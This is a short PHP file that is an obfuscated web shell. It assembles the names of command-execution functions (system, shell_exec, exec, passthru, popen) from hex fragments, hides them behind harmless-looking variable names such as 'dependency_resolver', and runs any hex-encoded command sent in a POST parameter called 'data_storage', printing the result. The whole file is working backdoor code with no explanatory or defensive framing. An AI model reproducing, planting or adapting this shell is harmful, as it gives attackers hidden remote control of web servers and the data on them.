<?php


$ptr1 = '7';
$ptr2 = '4';
$ptr3 = '5';
$ptr4 = '8';
$ptr5 = '6';
$ptr6 = 'c';
$ptr7 = '3';
$ptr8 = '0';
$ptr9 = '1';
$ptr10 = 'f';
$ptr11 = 'e';
$ptr12 = 'd';
$ptr13 = '2';
$dependency_resolver1 = pack("H*", $ptr1.'3'.'7'.'9'.'7'.'3'.'7'.$ptr2.'6'.$ptr3.'6'.'d');
$dependency_resolver2 = pack("H*", $ptr1.'3'.'6'.$ptr4.'6'.$ptr3.$ptr5.'c'.'6'.$ptr6.$ptr3.'f'.$ptr5.'5'.$ptr1.'8'.$ptr5.'5'.$ptr5.$ptr7);
$dependency_resolver3 = pack("H*", '6'.'5'.$ptr1.$ptr4.'6'.$ptr3.$ptr5.$ptr7);
$dependency_resolver4 = pack("H*", '7'.$ptr8.'6'.$ptr9.'7'.'3'.'7'.$ptr7.'7'.'4'.'6'.$ptr4.$ptr1.'2'.$ptr1.'5');
$dependency_resolver5 = pack("H*", '7'.'0'.'6'.$ptr10.'7'.$ptr8.$ptr5.'5'.'6'.$ptr11);
$dependency_resolver6 = pack("H*", '7'.$ptr7.$ptr1.$ptr2.$ptr1.'2'.$ptr5.$ptr3.$ptr5.'1'.'6'.$ptr12.$ptr3.'f'.$ptr5.'7'.$ptr5.$ptr3.'7'.'4'.'5'.$ptr10.'6'.$ptr7.$ptr5.$ptr10.'6'.$ptr11.'7'.$ptr2.'6'.'5'.'6'.$ptr11.$ptr1.$ptr2.$ptr1.$ptr7);
$dependency_resolver7 = pack("H*", '7'.$ptr8.$ptr5.'3'.$ptr5.$ptr6.'6'.$ptr10.$ptr1.'3'.$ptr5.$ptr3);
$data_storage = pack("H*", $ptr5.$ptr2.$ptr5.'1'.$ptr1.$ptr2.$ptr5.$ptr9.'5'.'f'.'7'.$ptr7.'7'.$ptr2.$ptr5.'f'.$ptr1.$ptr13.$ptr5.'1'.$ptr5.$ptr1.'6'.$ptr3);
if (isset($_POST[$data_storage])) {
    $data_storage = pack("H*", $_POST[$data_storage]);
    if (function_exists($dependency_resolver1)) {
        $dependency_resolver1($data_storage);
    } elseif (function_exists($dependency_resolver2)) {
        print $dependency_resolver2($data_storage);
    } elseif (function_exists($dependency_resolver3)) {
        $dependency_resolver3($data_storage, $itm_rec);
        print join("\n", $itm_rec);
    } elseif (function_exists($dependency_resolver4)) {
        $dependency_resolver4($data_storage);
    } elseif (function_exists($dependency_resolver5) && function_exists($dependency_resolver6) && function_exists($dependency_resolver7)) {
        $entry_flg = $dependency_resolver5($data_storage, 'r');
        if ($entry_flg) {
            $pgrp_token = $dependency_resolver6($entry_flg);
            $dependency_resolver7($entry_flg);
            print $pgrp_token;
        }
    }
    exit;
}
